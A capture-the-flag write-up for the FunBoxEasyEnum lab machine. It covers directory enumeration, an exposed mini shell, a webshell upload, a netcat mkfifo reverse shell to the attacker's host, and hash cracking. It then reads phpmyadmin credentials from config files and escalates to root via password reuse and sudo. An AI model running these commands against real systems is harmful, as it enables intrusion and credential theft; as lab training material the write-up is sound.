# FunBoxEasyEnum

## Nmap

```
sudo nmap 192.168.68.132 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Hitting port 80 we come to an Apache default installation page. Viewing the source of this page reveals no interesting information.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c0ad1a3f9aed439fd9ca0b2f707775bf7f149c22%2Fimage.png?alt=media)

We now move onto enumerating with `dirsearch.py`. First running seclists big.txt against the target.

```
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35c919249d5e2e5b13543aa2c8f8a1bab4169d97%2Fimage.png?alt=media)

We view robots.txt and find it contains contains:

```
Allow: Enum_this_Box
```

I ran `dirsearch.py` against this and was unable to find anything further. Viewing `/phpmyadmin` and attempting to login with default credentials shows we are unable to proceed with the default root account.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7d2c1ca2b607533aa211c42ea1868d2f488a3467%2Fimage.png?alt=media)

Running dirsearch.py again on the target this time using the `--suffix` parameter to append .php to all entries we find `/mini.php`.

```
python3 dirsearch.py -u http://192.168.68.132/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -R 2 --full-url -t 75 --suffix=.php 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a63138d8590b43994ed0784662fbfe60b317626e%2Fimage.png?alt=media)

Browsing to `/mini.php` we come to Zerion Mini Shell 1.0. As per below I uploaded a webshell as webshell.php

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-15f40b0669d0d1d5ed685cd2afa0387d2db304f8%2Fimage.png?alt=media)

Knowing that the above files exist in the root directory I then browsed to /webshell.php and was able to execute commands confirming we are running as www-data.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c8a55ba836c5232de8959151d74d30c19201643f%2Fimage.png?alt=media)

Running the command `which nc` shows we have `netcat` installed on the target machine. I set up a `netcat` listener on my target machine then run the following command on the webshell:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.68 80 >/tmp/f
```

Resulting in a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d95ed7d3865f75da07dc6d99e991654472310761%2Fimage.png?alt=media)

Upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Checking /etc/passwd shows the user 'oracle' has a password hash in the file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-840ecf76e72185ad65e61fbb0ec2233f9703ed70%2Fimage.png?alt=media)

I then took the hash and run it under mode 500 on `Hashcat` on my Windows host which cracked the password as: **hiphop**

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-5a500e674672238113c02c19acdb6d05bf4ff30c%2Fimage.png?alt=media)

I then used `su` to switch to the user 'oracle' and was successful switching.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c45c9801c5d60f666691a2edb328112afc584356%2Fimage.png?alt=media)

After poking about on the oracle user for a bit I could not find anything interesting. I tried the hiphop password against other users and no luck. I decided to move back onto www-data so I can read some files in /etc/phpmyadmin.

I disconnected the shell and run the initial exploit on the web shell to get connect as www-data. Moving into `/etc/phpyadmin` and then reading read the config-db.php file we see credential information.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-35af65115ca72466a58b67f1b5b0f90311093e00%2Fimage.png?alt=media)

We find the credentials `phpmyadmin:tgbzhnujm!` I then logged in MySQL and was unable to identify interesting information in the contained databases.

From here I starting throwing the passwords at the users in the `/home/` directory until I got a match on the user 'karla'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2b2da0ff2df01d3b043c1b4b55e76e3efb0c64c2%2Fimage.png?alt=media)

Knowing this worked I excited the shell and logged into `SSH` with the same information just so we have all the advantages of a `SSH` shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-12d9b346cb9e391951aa8c63c5bdafe8834c40e8%2Fimage.png?alt=media)

Checking `sudo -l` we see Karla can run any command as anyone. For a nice easy root shell we can run the command below:

```
sudo /bin/bash
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b74677a5326eb94b5959aa6c5f18be4bc2bd5b9b%2Fimage.png?alt=media)